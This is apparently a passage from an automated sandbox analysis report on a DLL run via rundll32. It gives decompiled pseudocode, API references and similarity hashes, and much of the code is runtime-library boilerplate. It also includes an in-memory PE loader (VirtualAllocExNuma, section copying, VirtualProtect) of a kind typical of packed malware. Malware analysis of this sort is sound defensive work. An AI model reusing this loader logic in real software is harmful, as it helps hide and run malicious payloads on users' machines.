0x10005b9a
0x10005ba5
0x10005b5b
0x10005b5b
0x10005b5d
0x10005b5f
0x10005b68
0x10005b88
0x10005b97
0x10005b6a
0x10005b6f
0x10005b78
0x10005b85
0x10005b85
0x10005b68
0x10005b59
0x10005b51
0x10005b38
0x10005b28
0x10005af6
0x10005a50
0x10005a57
0x00000000
0x10005a57
0x10005a21
0x10005a2a
0x10005a30
0x10005a32
0x10005a37
0x10005a5d
0x10005a5f
0x10005a6d
0x00000000
0x00000000
0x00000000
0x10005a37
0x10005a1f
0x10005a01
0x1000599f
0x10005963
0x10005963
0x10005968
0x10005976
0x10005976
0x10005952
0x10005952
0x10005952

APIs

Part of subcall function 10005380: SetLastError.KERNEL32(0000000D,?,10005949,1000505B,00000040,00000000,?,100058DF,00000000,1000505B,10005C60,10005C40,10005C30,00000000,?,1000505B), ref: 1000538D

SetLastError.KERNEL32(000000C1,1000505B,?,00000000,1000505B,00000040,00000000,?,100058DF,00000000,1000505B,10005C60,10005C40,10005C30,00000000), ref: 10005968

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 98e127df131897d20ae8639ae4644a0313f20c6e2d9df892f48c0a56ff9ece17
Instruction ID: cfb1a5eeaf1fe20a2779f56c6008c0e3c02513e87f4849dd93d5f1cb63de4bcd
Opcode Fuzzy Hash: 98e127df131897d20ae8639ae4644a0313f20c6e2d9df892f48c0a56ff9ece17
Instruction Fuzzy Hash: CA81A136701205ABE700DF69CC84B6AB7E4FF883A2F11416AFD04D7245E772E9548BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10002D90, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E10002D90(signed int* __ecx, signed int _a4) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				signed int* _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int* _v36;
				char _v56;
				char _v76;
				char _v96;
				void* __ebx;
				signed int _t59;
				intOrPtr _t65;
				signed int _t66;
				signed int _t67;
				signed int _t81;
				signed int _t82;
				signed char* _t92;
				signed char _t95;
				void* _t100;
				intOrPtr* _t103;
				intOrPtr _t104;
				intOrPtr* _t105;
				void* _t108;
				intOrPtr* _t109;
				signed char _t114;
				signed char** _t117;
				intOrPtr _t119;
				signed char** _t121;
				signed int _t125;
				signed int* _t128;
				signed int _t130;
				void* _t131;

				_push(0xffffffff);
				_push(E1001BE40);
				_push( *[fs:0x0]);
				_push(_t100);
				_t59 =  *0x10026250; // 0x93b758c1
				_push(_t59 ^ _t130);
				 *[fs:0x0] =  &_v16;
				_v20 = _t131 - 0x50;
				_t128 = __ecx;
				_v24 = __ecx;
				_v28 = 0;
				_v36 = __ecx;
				_t103 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 4)) + __ecx + 0x38));
				if(_t103 != 0) {
					 *((intOrPtr*)( *_t103 + 4))();
				}
				_v8 = 0;
				_t65 =  *((intOrPtr*)( *_t128 + 4));
				if( *((intOrPtr*)(_t65 +  &(_t128[3]))) == 0) {
					_t119 =  *((intOrPtr*)(_t65 +  &(_t128[0xf])));
					if(_t119 != 0 && _t119 != _t128) {
						E10002B20(_t100, _t119);
					}
				}
				_t66 =  *_t128;
				_t104 =  *((intOrPtr*)(_t66 + 4));
				_t67 = _t66 & 0xffffff00 |  *((intOrPtr*)(_t104 +  &(_t128[3]))) == 0x00000000;
				_v32 = _t67;
				_v8 = 1;
				if(_t67 != 0) {
					_t105 =  *((intOrPtr*)(_t104 +  &(_t128[0xe])));
					_v8 = 2;
					__eflags =  *( *(_t105 + 0x20));
					if( *( *(_t105 + 0x20)) == 0) {
						L11:
						__eflags =  *((intOrPtr*)( *_t105 + 0xc))(_a4 & 0x000000ff) - 0xffffffff;
						_t125 =  ==  ? 4 : 0;
						L12:
						_v8 = 1;
						goto L13;
					}
					_t121 =  *(_t105 + 0x30);
					_t92 =  *_t121;
					__eflags = _t92;
					if(_t92 <= 0) {
						goto L11;
					}
					 *_t121 = _t92 - 1;
					_t117 =  *(_t105 + 0x20);
					_t29 =  &(( *_t117)[1]); // 0x1
					 *_t117 = _t29;
					_t95 = _a4;
					 *( *_t117) = _t95;
					__eflags = (_t95 & 0x000000ff) - 0xffffffff;
					_t125 =  ==  ? 4 : 0;
					goto L12;
				} else {
					_t125 = 4;
					L13:
					_t108 =  *((intOrPtr*)( *_t128 + 4)) + _t128;
					if(_t125 != 0) {
						_t81 =  *(_t108 + 0xc) | _t125;
						if( *((intOrPtr*)(_t108 + 0x38)) == 0) {
							_t81 = _t81 | 0x00000004;
						}
						_t82 = _t81 & 0x00000017;
						 *(_t108 + 0xc) = _t82;
						_t114 =  *(_t108 + 0x10) & _t82;
						if(_t114 != 0) {
							if((_t114 & 0x00000004) != 0) {
								_t114 =  &_v56;
								E100020F0(_t100, _t114, 1, 0x10026008, "ios_base::badbit set");
								_v56 = 0x1001d34c;
								E10007F53( &_v56, 0x100245ac);
							}
							_t144 = _t114 & 0x00000002;
							if((_t114 & 0x00000002) != 0) {
								E100020F0(_t100,  &_v76, 1, 0x10026008, "ios_base::failbit set");
								_v76 = 0x1001d34c;
								E10007F53( &_v76, 0x100245ac);
							}
							E100020F0(_t100,  &_v96, 1, 0x10026008, "ios_base::eofbit set");
							_v96 = 0x1001d34c;
							E10007F53( &_v96, 0x100245ac);
						}
					}
					_v8 = 0xffffffff;
					if(L10006007(_t144) == 0) {
						E10002650(_t128);
					}
					_t109 =  *((intOrPtr*)( *((intOrPtr*)( *_t128 + 4)) +  &(_t128[0xe])));
					if(_t109 != 0) {
						 *((intOrPtr*)( *_t109 + 8))();
					}
					 *[fs:0x0] = _v16;
					return _t128;
				}
			}

0x10002d93
0x10002d95
0x10002da0
0x10002da4
0x10002da7
0x10002dae
0x10002db2
0x10002db8
0x10002dbb
0x10002dbd
0x10002dc4
0x10002dc7
0x10002dcd
0x10002dd3
0x10002dd7
0x10002dd7
0x10002ddc
0x10002de3
0x10002deb
0x10002ded
0x10002df3
0x10002df9
0x10002df9
0x10002df3
0x10002dfe
0x10002e00
0x10002e08
0x10002e0b
0x10002e0e
0x10002e17
0x10002e23
0x10002e27
0x10002e2e
0x10002e31
0x10002e5e
0x10002e6a
0x10002e72
0x10002eac
0x10002eac
0x00000000
0x10002eac
0x10002e33
0x10002e36
0x10002e38
0x10002e3a
0x00000000
0x00000000
0x10002e3d
0x10002e3f
0x10002e44
0x10002e47
0x10002e4e
0x10002e51
0x10002e56
0x10002e59
0x00000000
0x10002e19
0x10002e19
0x10002eb3
0x10002eb8
0x10002ebc
0x10002ec5
0x10002ecb
0x10002ecd
0x10002ecd
0x10002ed0
0x10002ed3
0x10002ed9
0x10002edb
0x10002ee4
0x10002ef2
0x10002ef5
0x10002f02
0x10002f0a
0x10002f0a
0x10002f0f
0x10002f12
0x10002f23
0x10002f30
0x10002f38
0x10002f38
0x10002f4c
0x10002f59
0x10002f61
0x10002f61
0x10002edb
0x10002f66
0x10002f74
0x10002f78
0x10002f78
0x10002f82
0x10002f88
0x10002f8c
0x10002f8c
0x10002f94
0x10002fa2
0x10002fa2

APIs

__CxxThrowException@8.LIBCMT ref: 10002F0A
__CxxThrowException@8.LIBCMT ref: 10002F38
__CxxThrowException@8.LIBCMT ref: 10002F61

Strings

ios_base::failbit set, xrefs: 10002F14
ios_base::badbit set, xrefs: 10002EE6
ios_base::eofbit set, xrefs: 10002F3D

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: dd0a37525d8e27cbe4eec21e8121db03be2461b3873a3f0e3ccf780e224304a2
Instruction ID: 184f3358093772ed79b5a221bbd4a13daf856bd8bf967c37909474a893557e90
Opcode Fuzzy Hash: dd0a37525d8e27cbe4eec21e8121db03be2461b3873a3f0e3ccf780e224304a2
Instruction Fuzzy Hash: B851BC74A006459FEB10DF58C980BA9BBF1FF44394F6081ADE5169B396CB75EE42CB40

Uniqueness

Uniqueness Score: -1.00%

Function 10006D8C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E10006D8C(void* __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t66;
				signed int _t74;
				signed int _t76;
				void* _t78;
				signed int _t80;
				signed int _t86;
				signed int _t89;
				intOrPtr _t92;
				signed int* _t101;
				signed int _t105;
				signed int* _t106;
				void* _t108;
				signed int _t110;
				void* _t111;
				void* _t112;

				_push(0x30);
				E100090B1(E1001BF8A, __ebx, __edi, __esi);
				_t108 = __ecx;
				_t86 =  *(_t111 + 8);
				_t110 = __esi | 0xffffffff;
				if(_t86 != _t110) {
					_t89 =  *( *(__ecx + 0x20));
					__eflags = _t89;
					if(_t89 == 0) {
						L6:
						__eflags =  *(_t108 + 0x50);
						if( *(_t108 + 0x50) == 0) {
							L34:
							L35:
							return E1000906F(_t86, _t108, _t110);
						}
						E10006B6C(_t108);
						__eflags =  *(_t108 + 0x40);
						if(__eflags != 0) {
							 *(_t111 - 0x34) = _t86;
							 *((intOrPtr*)(_t111 - 0x14)) = 0xf;
							 *((intOrPtr*)(_t111 - 0x18)) = 0;
							 *(_t111 - 0x28) = 0;
							E10006C36(_t111 - 0x28, _t101, _t110, 8, 0);
							_t14 = _t111 - 4;
							 *_t14 =  *(_t111 - 4) & 0x00000000;
							__eflags =  *_t14;
							while(1) {
								L11:
								_t66 =  *(_t111 - 0x28);
								_t92 =  *((intOrPtr*)(_t111 - 0x14));
								 *(_t111 - 0x30) = _t66;
								while(1) {
									__eflags = _t92 - 0x10;
									if(_t92 < 0x10) {
										_t66 = _t111 - 0x28;
									}
									 *(_t111 - 0x2c) = _t66;
									__eflags = _t92 - 0x10;
									if(_t92 < 0x10) {
										 *(_t111 - 0x30) = _t111 - 0x28;
									}
									_t74 =  *((intOrPtr*)( *( *(_t108 + 0x40)) + 0x1c))(_t108 + 0x48, _t111 - 0x34, _t111 - 0x33, _t111 - 0x3c,  *(_t111 - 0x30),  *((intOrPtr*)(_t111 - 0x18)) +  *(_t111 - 0x2c), _t111 - 0x38);
									_t86 =  *(_t111 + 8);
									__eflags = _t74;
									if(_t74 < 0) {
										break;
									}
									__eflags = _t74 - 1;
									if(_t74 > 1) {
										__eflags = _t74 - 3;
										if(__eflags != 0) {
											break;
										}
										_t76 = E100065AC(__eflags,  *(_t111 - 0x34),  *(_t108 + 0x50));
										__eflags = _t76;
										if(_t76 == 0) {
											break;
										}
										L32:
										_t110 = _t86;
										break;
									}
									_t92 =  *((intOrPtr*)(_t111 - 0x14));
									_t66 =  *(_t111 - 0x28);
									 *(_t111 - 0x30) = _t66;
									__eflags = _t92 - 0x10;
									if(_t92 < 0x10) {
										 *(_t111 - 0x2c) = _t111 - 0x28;
									} else {
										 *(_t111 - 0x2c) = _t66;
									}
									_t105 =  *((intOrPtr*)(_t111 - 0x38)) -  *(_t111 - 0x2c);
									__eflags = _t105;
									 *(_t111 - 0x2c) = _t105;
									if(_t105 == 0) {
										L26:
										 *((char*)(_t108 + 0x45)) = 1;
										__eflags =  *((intOrPtr*)(_t111 - 0x3c)) - _t111 - 0x34;
										_t86 =  *(_t111 + 8);
										if( *((intOrPtr*)(_t111 - 0x3c)) != _t111 - 0x34) {
											goto L32;
										}
										__eflags = _t105;
										if(_t105 != 0) {
											continue;
										}
										__eflags =  *((intOrPtr*)(_t111 - 0x18)) - 0x20;
										if( *((intOrPtr*)(_t111 - 0x18)) >= 0x20) {
											break;
										}
										_push(_t105);
										E10006BD5(_t66, _t111 - 0x28, _t105, _t110, 8);
										goto L11;
									} else {
										__eflags = _t92 - 0x10;
										if(__eflags < 0) {
											_t66 = _t111 - 0x28;
										}
										_push( *(_t108 + 0x50));
										_push(_t105);
										_push(1);
										_push(_t66);
										_t78 = E1000B55D(_t86, _t105, _t108, _t110, __eflags);
										_t105 =  *(_t111 - 0x2c);
										_t112 = _t112 + 0x10;
										__eflags = _t105 - _t78;
										if(_t105 != _t78) {
											break;
										} else {
											_t66 =  *(_t111 - 0x28);
											_t92 =  *((intOrPtr*)(_t111 - 0x14));
											 *(_t111 - 0x30) = _t66;
											goto L26;
										}
									}
								}
								E10001390(_t111 - 0x28, 1, 0);
								goto L34;
							}
						}
						_t80 = E100065AC(__eflags, _t86,  *(_t108 + 0x50)); // executed
						__eflags = _t80;
						if(_t80 == 0) {
							_t86 = _t110;
						}
						L5:
						goto L35;
					}
					_t101 =  *(__ecx + 0x30);
					__eflags = _t89 -  *_t101 + _t89;
					if(_t89 >=  *_t101 + _t89) {
						goto L6;
					}
					 *_t101 =  *_t101 - 1;
					__eflags =  *_t101;
					_t106 =  *(__ecx + 0x20);
					_t110 =  *_t106;
					 *_t106 = _t110 + 1;
					 *_t110 = _t86;
					goto L5;
				}
				goto L35;
			}

0x10006d8c
0x10006d93
0x10006d98
0x10006d9a
0x10006d9d
0x10006da2
0x10006dae
0x10006db0
0x10006db2
0x10006dd4
0x10006dd4
0x10006dd8
0x10006f0f
0x10006f11
0x10006f16
0x10006f16
0x10006de0
0x10006de7
0x10006dea
0x10006e05
0x10006e08
0x10006e0f
0x10006e12
0x10006e15
0x10006e1a
0x10006e1a
0x10006e1a
0x10006e1e
0x10006e1e
0x10006e1e
0x10006e21
0x10006e24
0x10006e27
0x10006e27
0x10006e2a
0x10006e2c
0x10006e2c
0x10006e2f
0x10006e32
0x10006e35
0x10006e3a
0x10006e3a
0x10006e60
0x10006e63
0x10006e66
0x10006e68
0x00000000
0x00000000
0x10006e6e
0x10006e71
0x10006eeb
0x10006eee
0x00000000
0x00000000
0x10006ef6
0x10006efd
0x10006eff
0x00000000
0x00000000
0x10006f01
0x10006f01
0x00000000
0x10006f01
0x10006e73
0x10006e76
0x10006e79
0x10006e7c
0x10006e7f
0x10006e89
0x10006e81
0x10006e81
0x10006e81
0x10006e8f
0x10006e8f
0x10006e92
0x10006e95
0x10006ebe
0x10006ec1
0x10006ec5
0x10006ec8
0x10006ecb
0x00000000
0x00000000
0x10006ecd
0x10006ecf
0x00000000
0x00000000
0x10006ed5
0x10006ed9
0x00000000
0x00000000
0x10006edb
0x10006ee1
0x00000000
0x10006e97
0x10006e97
0x10006e9a
0x10006e9c
0x10006e9c
0x10006e9f
0x10006ea2
0x10006ea3
0x10006ea5
0x10006ea6
0x10006eab
0x10006eae
0x10006eb1
0x10006eb3
0x00000000
0x10006eb5
0x10006eb5
0x10006eb8
0x10006ebb
0x00000000
0x10006ebb
0x10006eb3
0x10006e95
0x10006f0a
0x00000000
0x10006f0a
0x10006e1e
0x10006df0
0x10006df7
0x10006df9
0x10006dfb
0x10006dfb
0x10006dcd
0x00000000
0x10006dcd
0x10006db4
0x10006dbb
0x10006dbd
0x00000000
0x00000000
0x10006dbf
0x10006dbf
0x10006dc1
0x10006dc4
0x10006dc9
0x10006dcb
0x00000000
0x10006dcb
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 10006D93

Strings

, xrefs: 10006ED5

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: H_prolog3_
String ID:
API String ID: 2427045233-3916222277
Opcode ID: 3c42298a99847af803783aefb9bd7fd04e1df8c5c9e1d4bcbe3378ad4be6d8ca
Instruction ID: 4f05ca980260ddd7ac07afa767dcab1d24768edbeb4850510e070caf5b053fbf
Opcode Fuzzy Hash: 3c42298a99847af803783aefb9bd7fd04e1df8c5c9e1d4bcbe3378ad4be6d8ca
Instruction Fuzzy Hash: 7C512F75A0024AAFEF14CFA4D8909EDB7B6FF0C390F24452AE501A7645D731A954CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10007764, Relevance: 4.5, APIs: 3, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E10007764(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v0;
				char* _v8;
				int _v20;
				void* _t10;
				int _t11;
				int _t15;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t19;
				void* _t24;
				void* _t25;

				_t25 = __edi;
				_t19 = __ebx;
				while(1) {
					_t10 = E10008B0B(_t19, _t24, _t25, _a4); // executed
					if(_t10 != 0) {
						break;
					}
					_t11 = E1000DF30(_t10, _a4);
					__eflags = _t11;
					if(_t11 == 0) {
						_push(1);
						_v8 = "bad allocation";
						E10008BF9( &_v20,  &_v8);
						_v20 = 0x1001d3f8;
						_t15 = E10007F53( &_v20, 0x10024660);
						asm("int3");
						__eflags = _v20;
						if(_v20 != 0) {
							_t15 = HeapFree( *0x10028244, 0, _v0);
							__eflags = _t15;
							if(__eflags == 0) {
								_t16 = E1000BE7A(__eflags);
								_t18 = E1000BE8D(GetLastError());
								 *_t16 = _t18;
								return _t18;
							}
						}
						return _t15;
					} else {
						continue;
					}
					L10:
				}
				return _t10;
				goto L10;
			}

0x10007764
0x10007764
0x10007779
0x1000777c
0x10007784
0x00000000
0x00000000
0x1000776f
0x10007775
0x10007777
0x1000778a
0x1000778f
0x1000779a
0x100077a7
0x100077af
0x100077b4
0x10008ad6
0x10008ada
0x10008ae7
0x10008aed
0x10008aef
0x10008af2
0x10008b00
0x10008b06
0x00000000
0x10008b08
0x10008aef
0x10008b0a
0x00000000
0x00000000
0x00000000
0x00000000
0x10007777
0x10007789
0x00000000

APIs

_malloc.LIBCMT ref: 1000777C

Part of subcall function 10008B0B: __FF_MSGBANNER.LIBCMT ref: 10008B22
Part of subcall function 10008B0B: __NMSG_WRITE.LIBCMT ref: 10008B29
Part of subcall function 10008B0B: HeapAlloc.KERNEL32(008B0000,00000000,00000001,00000001,10003239,10003239,?,10008CB8,00000001,00000000,10003239,?,?,10008BF2,10005EC2,?), ref: 10008B4E

std::exception::exception.LIBCMT ref: 1000779A
__CxxThrowException@8.LIBCMT ref: 100077AF

Part of subcall function 10007F53: RaiseException.KERNEL32(?,?,10005ED7,10003239,10003239,?,?,?,?,?,10005ED7,10003239,100246B4,?), ref: 10007FA8

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID:
API String ID: 1059622496-0
Opcode ID: 5578d8ba46dc34250526799babce2a7153cce74536d69f1d7bc803f37bef0983
Instruction ID: 28b11d2a9bcbe1dcbb4d7f7164691bd8e3d6104dc5914b4fb807f9e679c40bbc
Opcode Fuzzy Hash: 5578d8ba46dc34250526799babce2a7153cce74536d69f1d7bc803f37bef0983
Instruction Fuzzy Hash: 7BE0E57880420FA7EB00EF64CC019EE777CFF002C0F504066F91866189DF75EB408AA2

Uniqueness

Uniqueness Score: -1.00%

Function 100023E0, Relevance: 4.5, APIs: 3, Instructions: 26
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E100023E0(intOrPtr _a4, intOrPtr _a8) {
				void* _t4;
				intOrPtr _t8;
				void* _t10;

				_push(0);
				_push(0x40);
				_push(0x3000);
				_push(_a8);
				_push(0);
				_t4 = GetCurrentProcess();
				_push(_t4); // executed
				L10005DB0(); // executed
				_t8 =  *0x10026074; // 0x0
				_t10 = _t4;
				_t9 =  !=  ? 0 : _t8;
				 *0x10026074 =  !=  ? 0 : _t8;
				E100083B0(_t10, _a4, _a8);
				return _t10;
			}

0x100023e4
0x100023e6
0x100023e8
0x100023ed
0x100023f0
0x100023f2
0x100023f8
0x100023f9
0x10002401
0x10002407
0x10002411
0x10002414
0x1000241a
0x10002426

APIs

GetCurrentProcess.KERNEL32(00000000,10004DDD,00003000,00000040,00000000,00000000,?,10004DDD,?,00000011), ref: 100023F2
VirtualAllocExNuma.KERNEL32 ref: 100023F9
_memmove.LIBCMT ref: 1000241A

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AllocCurrentNumaProcessVirtual_memmove
String ID:
API String ID: 2645175684-0
Opcode ID: bc547550e97c8ea80c68fac8ddef4ec99e16a52b1573b813d70c4ba24bb6b7bb
Instruction ID: e6abe3c0586a238576c75cfb34d77ec267e81212c761a084bd708630f9583876
Opcode Fuzzy Hash: bc547550e97c8ea80c68fac8ddef4ec99e16a52b1573b813d70c4ba24bb6b7bb
Instruction Fuzzy Hash: 7AE02079700204B7FB125B719C45F1B3BB9E7C8B51F004025FF0C8A290D631F5019714

Uniqueness

Uniqueness Score: -1.00%

Function 100054F0, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E100054F0(intOrPtr* _a4, long _a8) {
				long _t31;
				signed int _t32;
				intOrPtr* _t37;
				void* _t47;
				void** _t48;
				signed int _t52;
				signed int _t55;
				long _t56;

				_t48 = _a8;
				_t56 = _t48[2];
				if(_t56 != 0) {
					_t52 = _t48[3];
					if((_t52 & 0x02000000) == 0) {
						_t31 =  *(0x10026078 + ((_t52 >> 0x1f) + ((_t52 >> 0x0000001e & 0x00000001) + (_t52 >> 0x0000001d & 0x00000001) * 2) * 2) * 4);
						if((_t52 & 0x04000000) != 0) {
							_t31 = _t31 | 0x00000200;
						}
						_t32 = VirtualProtect( *_t48, _t56, _t31,  &_a8); // executed
						asm("sbb eax, eax");
						return  ~( ~_t32);
					} else {
						_t47 =  *_t48;
						if(_t47 == _t48[1]) {
							if(_t48[4] != 0) {
								L7:
								VirtualFree(_t47, _t56, 0x4000); // executed
							} else {
								_t37 = _a4;
								_t55 =  *(_t37 + 0x30);
								if( *((intOrPtr*)( *_t37 + 0x38)) == _t55 || _t56 % _t55 == 0) {
									goto L7;
								}
							}
						}
						return 1;
					}
				} else {
					return _t56 + 1;
				}
			}

0x100054f3
0x100054f7
0x100054fc
0x10005507
0x10005510
0x10005569
0x10005576
0x10005578
0x10005578
0x10005585
0x1000558e
0x10005594
0x10005512
0x10005512
0x10005517
0x1000551d
0x10005536
0x1000553d
0x1000551f
0x1000551f
0x10005522
0x1000552a
0x00000000
0x00000000
0x1000552a
0x1000551d
0x1000554b
0x1000554b
0x100054fe
0x10005503
0x10005503

APIs

VirtualFree.KERNELBASE(?,?,00004000,00000000,00000000,?,100056D3,?,?,?,?,00000000,00000000,00000000), ref: 1000553D

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: f86289224445b80c27eb129e9375647e4031fd20ff9a6ac3b64f6857b5d30af3
Instruction ID: 9beac5edc960ff82119499d4ec47d63246155c75e6d012c298e656db4114c09d
Opcode Fuzzy Hash: f86289224445b80c27eb129e9375647e4031fd20ff9a6ac3b64f6857b5d30af3
Instruction Fuzzy Hash: 4E11E2327005059FE310DE09DC90FA6B3AAFF947A2F46825AE405CB265DB32ED91CB90

Uniqueness

Uniqueness Score: -1.00%

Function 100053B0, Relevance: 2.6, APIs: 2, Instructions: 94
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E100053B0(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _t25;
				signed int _t26;
				void* _t34;
				intOrPtr _t48;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t58;
				long _t59;
				long* _t61;
				void* _t62;

				_t25 = _a16;
				_t53 =  *_t25;
				_t48 =  *((intOrPtr*)(_t25 + 4));
				_v12 = __ecx;
				_v8 = 0;
				_t26 =  *(_t53 + 0x14) & 0x0000ffff;
				if(0 >=  *((intOrPtr*)(_t53 + 6))) {
					L13:
					return 1;
				} else {
					_t7 = _t53 + 0x28; // 0x28
					_t61 = _t7 + _t26;
					while(1) {
						_t51 =  *_t61;
						if( *_t61 != 0) {
							goto L6;
						}
						_t59 =  *(_a12 + 0x38);
						if(_t59 <= 0) {
							L10:
							_t61 =  &(_t61[0xa]);
							_t58 = _v8 + 1;
							_v8 = _t58;
							if(_t58 >= ( *( *_a16 + 6) & 0x0000ffff)) {
								goto L13;
							} else {
								continue;
							}
						} else {
							if(VirtualAlloc( *((intOrPtr*)(_t61 - 4)) + _t48, _t59, 0x1000, 4) == 0) {
								L12:
								return 0;
							} else {
								 *((intOrPtr*)(_t61 - 8)) =  *((intOrPtr*)(_t61 - 4)) + _t48;
								E10005D20( *((intOrPtr*)(_t61 - 4)) + _t48, 0, _t59);
								L9:
								_t62 = _t62 + 0xc;
								goto L10;
							}
						}
						goto L14;
						L6:
						if(E10005380(_a8, _t61[1] + _t51) == 0) {
							goto L12;
						} else {
							_t34 = VirtualAlloc( *((intOrPtr*)(_t61 - 4)) + _t48,  *_t61, 0x1000, 4); // executed
							if(_t34 == 0) {
								goto L12;
							} else {
								_t56 =  *((intOrPtr*)(_t61 - 4)) + _t48;
								E10005D50(_t56, _t61[1] + _a4,  *_t61);
								 *((intOrPtr*)(_t61 - 8)) = _t56;
								goto L9;
							}
						}
						goto L14;
					}
				}
				L14:
			}

0x100053b6
0x100053bc
0x100053c0
0x100053c5
0x100053c8
0x100053cf
0x100053d7
0x10005490
0x10005499
0x100053dd
0x100053dd
0x100053e0
0x100053e2
0x100053e2
0x100053e6
0x00000000
0x00000000
0x100053eb
0x100053f0
0x10005464
0x10005467
0x1000546d
0x1000546e
0x10005479
0x00000000
0x1000547b
0x00000000
0x1000547b
0x100053f2
0x10005408
0x10005485
0x1000548b
0x1000540a
0x10005413
0x10005416
0x10005461
0x10005461
0x00000000
0x10005461
0x10005408
0x00000000
0x1000541d
0x1000542f
0x00000000
0x10005431
0x10005440
0x10005448
0x00000000
0x1000544a
0x10005455
0x10005459
0x1000545e
0x00000000
0x1000545e
0x10005448
0x00000000
0x1000542f
0x100053e2
0x00000000

APIs

VirtualAlloc.KERNEL32(?,00000001,00001000,00000004), ref: 10005400
VirtualAlloc.KERNELBASE(?,00000028,00001000,00000004,?,?,00000000,00000000,?,?), ref: 10005440

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
